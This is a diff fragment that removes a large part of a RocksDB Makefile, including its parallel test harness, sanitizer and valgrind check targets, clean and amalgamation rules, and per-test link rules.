-	find . -type f -regex ".*\.\(\(gcda\)\|\(gcno\)\)" -exec rm {} \;
-
-ifneq (,$(filter check parallel_check,$(MAKECMDGOALS)),)
-# Use /dev/shm if it has the sticky bit set (otherwise, /tmp),
-# and create a randomly-named rocksdb.XXXX directory therein.
-# We'll use that directory in the "make check" rules.
-ifeq ($(TMPD),)
-TMPDIR := $(shell echo $${TMPDIR:-/tmp})
-TMPD := $(shell f=/dev/shm; test -k $$f || f=$(TMPDIR);     \
-  perl -le 'use File::Temp "tempdir";'					\
-    -e 'print tempdir("'$$f'/rocksdb.XXXX", CLEANUP => 0)')
-endif
-endif
-
-# Run all tests in parallel, accumulating per-test logs in t/log-*.
-#
-# Each t/run-* file is a tiny generated bourne shell script that invokes one of
-# sub-tests. Why use a file for this?  Because that makes the invocation of
-# parallel below simpler, which in turn makes the parsing of parallel's
-# LOG simpler (the latter is for live monitoring as parallel
-# tests run).
-#
-# Test names are extracted by running tests with --gtest_list_tests.
-# This filter removes the "#"-introduced comments, and expands to
-# fully-qualified names by changing input like this:
-#
-#   DBTest.
-#     Empty
-#     WriteEmptyBatch
-#   MultiThreaded/MultiThreadedDBTest.
-#     MultiThreaded/0  # GetParam() = 0
-#     MultiThreaded/1  # GetParam() = 1
-#
-# into this:
-#
-#   DBTest.Empty
-#   DBTest.WriteEmptyBatch
-#   MultiThreaded/MultiThreadedDBTest.MultiThreaded/0
-#   MultiThreaded/MultiThreadedDBTest.MultiThreaded/1
-#
-
-parallel_tests = $(patsubst %,parallel_%,$(PARALLEL_TEST))
-.PHONY: gen_parallel_tests $(parallel_tests)
-$(parallel_tests): $(PARALLEL_TEST)
-	$(AM_V_at)TEST_BINARY=$(patsubst parallel_%,%,$@); \
-  TEST_NAMES=` \
-    ./$$TEST_BINARY --gtest_list_tests \
-    | perl -n \
-      -e 's/ *\#.*//;' \
-      -e '/^(\s*)(\S+)/; !$$1 and do {$$p=$$2; break};'	\
-      -e 'print qq! $$p$$2!'`; \
-	for TEST_NAME in $$TEST_NAMES; do \
-		TEST_SCRIPT=t/run-$$TEST_BINARY-$${TEST_NAME//\//-}; \
-		echo "  GEN     " $$TEST_SCRIPT; \
-    printf '%s\n' \
-      '#!/bin/sh' \
-      "d=\$(TMPD)$$TEST_SCRIPT" \
-      'mkdir -p $$d' \
-      "TEST_TMPDIR=\$$d $(DRIVER) ./$$TEST_BINARY --gtest_filter=$$TEST_NAME" \
-		> $$TEST_SCRIPT; \
-		chmod a=rx $$TEST_SCRIPT; \
-	done
-
-gen_parallel_tests:
-	$(AM_V_at)mkdir -p t
-	$(AM_V_at)rm -f t/run-*
-	$(MAKE) $(parallel_tests)
-
-# Reorder input lines (which are one per test) so that the
-# longest-running tests appear first in the output.
-# Do this by prefixing each selected name with its duration,
-# sort the resulting names, and remove the leading numbers.
-# FIXME: the "100" we prepend is a fake time, for now.
-# FIXME: squirrel away timings from each run and use them
-# (when present) on subsequent runs to order these tests.
-#
-# Without this reordering, these two tests would happen to start only
-# after almost all other tests had completed, thus adding 100 seconds
-# to the duration of parallel "make check".  That's the difference
-# between 4 minutes (old) and 2m20s (new).
-#
-# 152.120 PASS t/DBTest.FileCreationRandomFailure
-# 107.816 PASS t/DBTest.EncodeDecompressedBlockSizeTest
-#
-slow_test_regexp = \
-	^t/run-table_test-HarnessTest.Randomized$$|^t/run-db_test-.*(?:FileCreationRandomFailure|EncodeDecompressedBlockSizeTest)$$|^.*RecoverFromCorruptedWALWithoutFlush$$
-prioritize_long_running_tests =						\
-  perl -pe 's,($(slow_test_regexp)),100 $$1,'				\
-    | sort -k1,1gr							\
-    | sed 's/^[.0-9]* //'
-
-# "make check" uses
-# Run with "make J=1 check" to disable parallelism in "make check".
-# Run with "make J=200% check" to run two parallel jobs per core.
-# The default is to run one job per core (J=100%).
-# See "man parallel" for its "-j ..." option.
-J ?= 100%
-
-# Use this regexp to select the subset of tests whose names match.
-tests-regexp = .
-
-t_run = $(wildcard t/run-*)
-.PHONY: check_0
-check_0:
-	$(AM_V_GEN)export TEST_TMPDIR=$(TMPD); \
-	printf '%s\n' ''						\
-	  'To monitor subtest <duration,pass/fail,name>,'		\
-	  '  run "make watch-log" in a separate window' '';		\
-	test -t 1 && eta=--eta || eta=; \
-	{ \
-		printf './%s\n' $(filter-out $(PARALLEL_TEST),$(TESTS)); \
-		printf '%s\n' $(t_run); \
-	} \
-	  | $(prioritize_long_running_tests)				\
-	  | grep -E '$(tests-regexp)'					\
-	  | build_tools/gnu_parallel -j$(J) --plain --joblog=LOG $$eta --gnu '{} >& t/log-{/}'
-
-valgrind-blacklist-regexp = InlineSkipTest.ConcurrentInsert|TransactionTest.DeadlockStress|DBCompactionTest.SuggestCompactRangeNoTwoLevel0Compactions|BackupableDBTest.RateLimiting|DBTest.CloseSpeedup|DBTest.ThreadStatusFlush|DBTest.RateLimitingTest|DBTest.EncodeDecompressedBlockSizeTest|FaultInjectionTest.UninstalledCompaction|HarnessTest.Randomized|ExternalSSTFileTest.CompactDuringAddFileRandom|ExternalSSTFileTest.IngestFileWithGlobalSeqnoRandomized
-
-.PHONY: valgrind_check_0
-valgrind_check_0:
-	$(AM_V_GEN)export TEST_TMPDIR=$(TMPD);				\
-	printf '%s\n' ''						\
-	  'To monitor subtest <duration,pass/fail,name>,'		\
-	  '  run "make watch-log" in a separate window' '';		\
-	test -t 1 && eta=--eta || eta=;					\
-	{								\
-	  printf './%s\n' $(filter-out $(PARALLEL_TEST) %skiplist_test options_settable_test, $(TESTS));		\
-	  printf '%s\n' $(t_run);					\
-	}								\
-	  | $(prioritize_long_running_tests)				\
-	  | grep -E '$(tests-regexp)'					\
-	  | grep -E -v '$(valgrind-blacklist-regexp)'					\
-	  | build_tools/gnu_parallel -j$(J) --plain --joblog=LOG $$eta --gnu \
-	  '(if [[ "{}" == "./"* ]] ; then $(DRIVER) {}; else {}; fi) ' \
-	  '>& t/valgrind_log-{/}'
-
-CLEAN_FILES += t LOG $(TMPD)
-
-# When running parallel "make check", you can monitor its progress
-# from another window.
-# Run "make watch_LOG" to show the duration,PASS/FAIL,name of parallel
-# tests as they are being run.  We sort them so that longer-running ones
-# appear at the top of the list and any failing tests remain at the top
-# regardless of their duration. As with any use of "watch", hit ^C to
-# interrupt.
-watch-log:
-	watch --interval=0 'sort -k7,7nr -k4,4gr LOG|$(quoted_perl_command)'
-
-# If J != 1 and GNU parallel is installed, run the tests in parallel,
-# via the check_0 rule above.  Otherwise, run them sequentially.
-check: all
-	$(MAKE) gen_parallel_tests
-	$(AM_V_GEN)if test "$(J)" != 1                                  \
-	    && (build_tools/gnu_parallel --gnu --help 2>/dev/null) |                    \
-	        grep -q 'GNU Parallel';                                 \
-	then                                                            \
-	    $(MAKE) T="$$t" TMPD=$(TMPD) check_0;                       \
-	else                                                            \
-	    for t in $(TESTS); do                                       \
-	      echo "===== Running $$t"; ./$$t || exit 1; done;          \
-	fi
-	rm -rf $(TMPD)
-ifneq ($(PLATFORM), OS_AIX)
-ifeq ($(filter -DROCKSDB_LITE,$(OPT)),)
-	python tools/ldb_test.py
-	sh tools/rocksdb_dump_test.sh
-endif
-endif
-
-# TODO add ldb_tests
-check_some: $(SUBSET)
-	for t in $(SUBSET); do echo "===== Running $$t"; ./$$t || exit 1; done
-
-.PHONY: ldb_tests
-ldb_tests: ldb
-	python tools/ldb_test.py
-
-crash_test: whitebox_crash_test blackbox_crash_test
-
-blackbox_crash_test: db_stress
-	python -u tools/db_crashtest.py --simple blackbox $(CRASH_TEST_EXT_ARGS)
-	python -u tools/db_crashtest.py blackbox $(CRASH_TEST_EXT_ARGS)
-
-ifeq ($(CRASH_TEST_KILL_ODD),)
-  CRASH_TEST_KILL_ODD=888887
-endif
-
-whitebox_crash_test: db_stress
-	python -u tools/db_crashtest.py --simple whitebox --random_kill_odd \
-      $(CRASH_TEST_KILL_ODD) $(CRASH_TEST_EXT_ARGS)
-	python -u tools/db_crashtest.py whitebox  --random_kill_odd \
-      $(CRASH_TEST_KILL_ODD) $(CRASH_TEST_EXT_ARGS)
-
-asan_check:
-	$(MAKE) clean
-	COMPILE_WITH_ASAN=1 $(MAKE) check -j32
-	$(MAKE) clean
-
-asan_crash_test:
-	$(MAKE) clean
-	COMPILE_WITH_ASAN=1 $(MAKE) crash_test
-	$(MAKE) clean
-
-ubsan_check:
-	$(MAKE) clean
-	COMPILE_WITH_UBSAN=1 $(MAKE) check -j32
-	$(MAKE) clean
-
-ubsan_crash_test:
-	$(MAKE) clean
-	COMPILE_WITH_UBSAN=1 $(MAKE) crash_test
-	$(MAKE) clean
-
-valgrind_test:
-	DISABLE_JEMALLOC=1 $(MAKE) valgrind_check
-
-valgrind_check: $(TESTS)
-	$(MAKE) DRIVER="$(VALGRIND_VER) $(VALGRIND_OPTS)" gen_parallel_tests
-	$(AM_V_GEN)if test "$(J)" != 1                                  \
-	    && (build_tools/gnu_parallel --gnu --help 2>/dev/null) |                    \
-	        grep -q 'GNU Parallel';                                 \
-	then                                                            \
-      $(MAKE) TMPD=$(TMPD)                                        \
-      DRIVER="$(VALGRIND_VER) $(VALGRIND_OPTS)" valgrind_check_0; \
-	else                                                            \
-		for t in $(filter-out %skiplist_test options_settable_test,$(TESTS)); do \
-			$(VALGRIND_VER) $(VALGRIND_OPTS) ./$$t; \
-			ret_code=$$?; \
-			if [ $$ret_code -ne 0 ]; then \
-				exit $$ret_code; \
-			fi; \
-		done; \
-	fi
-
-
-ifneq ($(PAR_TEST),)
-parloop:
-	ret_bad=0;							\
-	for t in $(PAR_TEST); do		\
-		echo "===== Running $$t in parallel $(NUM_PAR)";\
-		if [ $(db_test) -eq 1 ]; then \
-			seq $(J) | v="$$t" build_tools/gnu_parallel --gnu --plain 's=$(TMPD)/rdb-{};  export TEST_TMPDIR=$$s;' \
-				'timeout 2m ./db_test --gtest_filter=$$v >> $$s/log-{} 2>1'; \
-		else\
-			seq $(J) | v="./$$t" build_tools/gnu_parallel --gnu --plain 's=$(TMPD)/rdb-{};' \
-			     'export TEST_TMPDIR=$$s; timeout 10m $$v >> $$s/log-{} 2>1'; \
-		fi; \
-		ret_code=$$?; \
-		if [ $$ret_code -ne 0 ]; then \
-			ret_bad=$$ret_code; \
-			echo $$t exited with $$ret_code; \
-		fi; \
-	done; \
-	exit $$ret_bad;
-endif
-
-test_names = \
-  ./db_test --gtest_list_tests						\
-    | perl -n								\
-      -e 's/ *\#.*//;'							\
-      -e '/^(\s*)(\S+)/; !$$1 and do {$$p=$$2; break};'			\
-      -e 'print qq! $$p$$2!'
-
-parallel_check: $(TESTS)
-	$(AM_V_GEN)if test "$(J)" > 1                                  \
-	    && (build_tools/gnu_parallel --gnu --help 2>/dev/null) |                    \
-	        grep -q 'GNU Parallel';                                 \
-	then                                                            \
-	    echo Running in parallel $(J);			\
-	else                                                            \
-	    echo "Need to have GNU Parallel and J > 1"; exit 1;		\
-	fi;								\
-	ret_bad=0;							\
-	echo $(J);\
-	echo Test Dir: $(TMPD); \
-        seq $(J) | build_tools/gnu_parallel --gnu --plain 's=$(TMPD)/rdb-{}; rm -rf $$s; mkdir $$s'; \
-	$(MAKE)  PAR_TEST="$(shell $(test_names))" TMPD=$(TMPD) \
-		J=$(J) db_test=1 parloop; \
-	$(MAKE) PAR_TEST="$(filter-out db_test, $(TESTS))" \
-		TMPD=$(TMPD) J=$(J) db_test=0 parloop;
-
-analyze: clean
-	$(CLANG_SCAN_BUILD) --use-analyzer=$(CLANG_ANALYZER) \
-		--use-c++=$(CXX) --use-cc=$(CC) --status-bugs \
-		-o $(CURDIR)/scan_build_report \
-		$(MAKE) dbg
-
-CLEAN_FILES += unity.cc
-unity.cc: Makefile
-	rm -f $@ $@-t
-	for source_file in $(LIB_SOURCES); do \
-		echo "#include \"$$source_file\"" >> $@-t; \
-	done
-	chmod a=r $@-t
-	mv $@-t $@
-
-unity.a: unity.o
-	$(AM_V_AR)rm -f $@
-	$(AM_V_at)$(AR) $(ARFLAGS) $@ unity.o
-
-# try compiling db_test with unity
-unity_test: db/db_test.o db/db_test_util.o $(TESTHARNESS) unity.a
-	$(AM_LINK)
-	./unity_test
-
-rocksdb.h rocksdb.cc: build_tools/amalgamate.py Makefile $(LIB_SOURCES) unity.cc
-	build_tools/amalgamate.py -I. -i./include unity.cc -x include/rocksdb/c.h -H rocksdb.h -o rocksdb.cc
-
-clean:
-	rm -f $(BENCHMARKS) $(TOOLS) $(TESTS) $(LIBRARY) $(SHARED)
-	rm -rf $(CLEAN_FILES) ios-x86 ios-arm scan_build_report
-	find . -name "*.[oda]" -exec rm -f {} \;
-	find . -type f -regex ".*\.\(\(gcda\)\|\(gcno\)\)" -exec rm {} \;
-	rm -rf bzip2* snappy* zlib* lz4* zstd*
-	cd java; $(MAKE) clean
-
-tags:
-	ctags * -R
-	cscope -b `find . -name '*.cc'` `find . -name '*.h'` `find . -name '*.c'`
-	ctags -e -R -o etags *
-
-format:
-	build_tools/format-diff.sh
-
-package:
-	bash build_tools/make_package.sh $(SHARED_MAJOR).$(SHARED_MINOR)
-
-# ---------------------------------------------------------------------------
-# 	Unit tests and tools
-# ---------------------------------------------------------------------------
-$(LIBRARY): $(LIBOBJECTS)
-	$(AM_V_AR)rm -f $@
-	$(AM_V_at)$(AR) $(ARFLAGS) $@ $(LIBOBJECTS)
-
-$(TOOLS_LIBRARY): $(BENCH_LIB_SOURCES:.cc=.o) $(TOOL_LIB_SOURCES:.cc=.o) $(LIB_SOURCES:.cc=.o) $(TESTUTIL)
-	$(AM_V_AR)rm -f $@
-	$(AM_V_at)$(AR) $(ARFLAGS) $@ $^
-
-librocksdb_env_basic_test.a: env/env_basic_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_AR)rm -f $@
-	$(AM_V_at)$(AR) $(ARFLAGS) $@ $^
-
-db_bench: tools/db_bench.o $(BENCHTOOLOBJECTS)
-	$(AM_LINK)
-
-cache_bench: cache/cache_bench.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-persistent_cache_bench: utilities/persistent_cache/persistent_cache_bench.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-memtablerep_bench: memtable/memtablerep_bench.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-db_stress: tools/db_stress.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-write_stress: tools/write_stress.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-db_sanity_test: tools/db_sanity_test.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-db_repl_stress: tools/db_repl_stress.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-arena_test: util/arena_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-autovector_test: util/autovector_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-column_family_test: db/column_family_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-table_properties_collector_test: db/table_properties_collector_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-bloom_test: util/bloom_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-dynamic_bloom_test: util/dynamic_bloom_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-c_test: db/c_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cache_test: cache/cache_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-coding_test: util/coding_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-hash_test: util/hash_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-option_change_migration_test: utilities/option_change_migration/option_change_migration_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-stringappend_test: utilities/merge_operators/string_append/stringappend_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cassandra_format_test: utilities/cassandra/cassandra_format_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cassandra_functional_test: utilities/cassandra/cassandra_functional_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cassandra_row_merge_test: utilities/cassandra/cassandra_row_merge_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cassandra_serialize_test: utilities/cassandra/cassandra_serialize_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-redis_test: utilities/redis/redis_lists_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-hash_table_test: utilities/persistent_cache/hash_table_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-histogram_test: monitoring/histogram_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-thread_local_test: util/thread_local_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-corruption_test: db/corruption_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-crc32c_test: util/crc32c_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-slice_transform_test: util/slice_transform_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_basic_test: db/db_basic_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_encryption_test: db/db_encryption_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_test: db/db_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_test2: db/db_test2.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_blob_index_test: db/db_blob_index_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_block_cache_test: db/db_block_cache_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_bloom_filter_test: db/db_bloom_filter_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_log_iter_test: db/db_log_iter_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_compaction_filter_test: db/db_compaction_filter_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_compaction_test: db/db_compaction_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_dynamic_level_test: db/db_dynamic_level_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_flush_test: db/db_flush_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_inplace_update_test: db/db_inplace_update_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_iterator_test: db/db_iterator_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_memtable_test: db/db_memtable_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_merge_operator_test: db/db_merge_operator_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_options_test: db/db_options_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_range_del_test: db/db_range_del_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_sst_test: db/db_sst_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_statistics_test: db/db_statistics_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_write_test: db/db_write_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-external_sst_file_basic_test: db/external_sst_file_basic_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-external_sst_file_test: db/external_sst_file_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_tailing_iter_test: db/db_tailing_iter_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_iter_test: db/db_iter_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_universal_compaction_test: db/db_universal_compaction_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_wal_test: db/db_wal_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_io_failure_test: db/db_io_failure_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_properties_test: db/db_properties_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_table_properties_test: db/db_table_properties_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-log_write_bench: util/log_write_bench.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK) $(PROFILING_FLAGS)
-
-plain_table_db_test: db/plain_table_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-comparator_db_test: db/comparator_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-table_reader_bench: table/table_reader_bench.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK) $(PROFILING_FLAGS)
-
-perf_context_test: db/perf_context_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS)
-
-prefix_test: db/prefix_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS)
-
-backupable_db_test: utilities/backupable/backupable_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-checkpoint_test: utilities/checkpoint/checkpoint_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-document_db_test: utilities/document/document_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-json_document_test: utilities/document/json_document_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-sim_cache_test: utilities/simulator_cache/sim_cache_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-spatial_db_test: utilities/spatialdb/spatial_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-env_mirror_test: utilities/env_mirror_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-env_timed_test: utilities/env_timed_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-ifdef ROCKSDB_USE_LIBRADOS
-env_librados_test: utilities/env_librados_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS) $(COVERAGEFLAGS)
-endif
-
-object_registry_test: utilities/object_registry_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-ttl_test: utilities/ttl/ttl_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-date_tiered_test: utilities/date_tiered/date_tiered_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_batch_with_index_test: utilities/write_batch_with_index/write_batch_with_index_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-flush_job_test: db/flush_job_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compaction_iterator_test: db/compaction_iterator_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compaction_job_test: db/compaction_job_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compaction_job_stats_test: db/compaction_job_stats_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compact_on_deletion_collector_test: utilities/table_properties_collectors/compact_on_deletion_collector_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-wal_manager_test: db/wal_manager_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-dbformat_test: db/dbformat_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-env_basic_test: env/env_basic_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-env_test: env/env_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-fault_injection_test: db/fault_injection_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-rate_limiter_test: util/rate_limiter_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-delete_scheduler_test: util/delete_scheduler_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-filename_test: db/filename_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-file_reader_writer_test: util/file_reader_writer_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-block_based_filter_block_test: table/block_based_filter_block_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-full_filter_block_test: table/full_filter_block_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-partitioned_filter_block_test: table/partitioned_filter_block_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-log_test: db/log_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cleanable_test: table/cleanable_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-table_test: table/table_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-block_test: table/block_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-inlineskiplist_test: memtable/inlineskiplist_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-skiplist_test: memtable/skiplist_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_buffer_manager_test: memtable/write_buffer_manager_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-version_edit_test: db/version_edit_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-version_set_test: db/version_set_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compaction_picker_test: db/compaction_picker_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-version_builder_test: db/version_builder_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-file_indexer_test: db/file_indexer_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-reduce_levels_test: tools/reduce_levels_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_batch_test: db/write_batch_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_controller_test: db/write_controller_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-merge_helper_test: db/merge_helper_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-memory_test: utilities/memory/memory_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-merge_test: db/merge_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-merger_test: table/merger_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-util_merge_operators_test: utilities/util_merge_operators_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-options_file_test: db/options_file_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-deletefile_test: db/deletefile_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-geodb_test: utilities/geodb/geodb_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-rocksdb_dump: tools/dump/rocksdb_dump.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-rocksdb_undump: tools/dump/rocksdb_undump.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-cuckoo_table_builder_test: table/cuckoo_table_builder_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cuckoo_table_reader_test: table/cuckoo_table_reader_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cuckoo_table_db_test: db/cuckoo_table_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-listener_test: db/listener_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-thread_list_test: util/thread_list_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
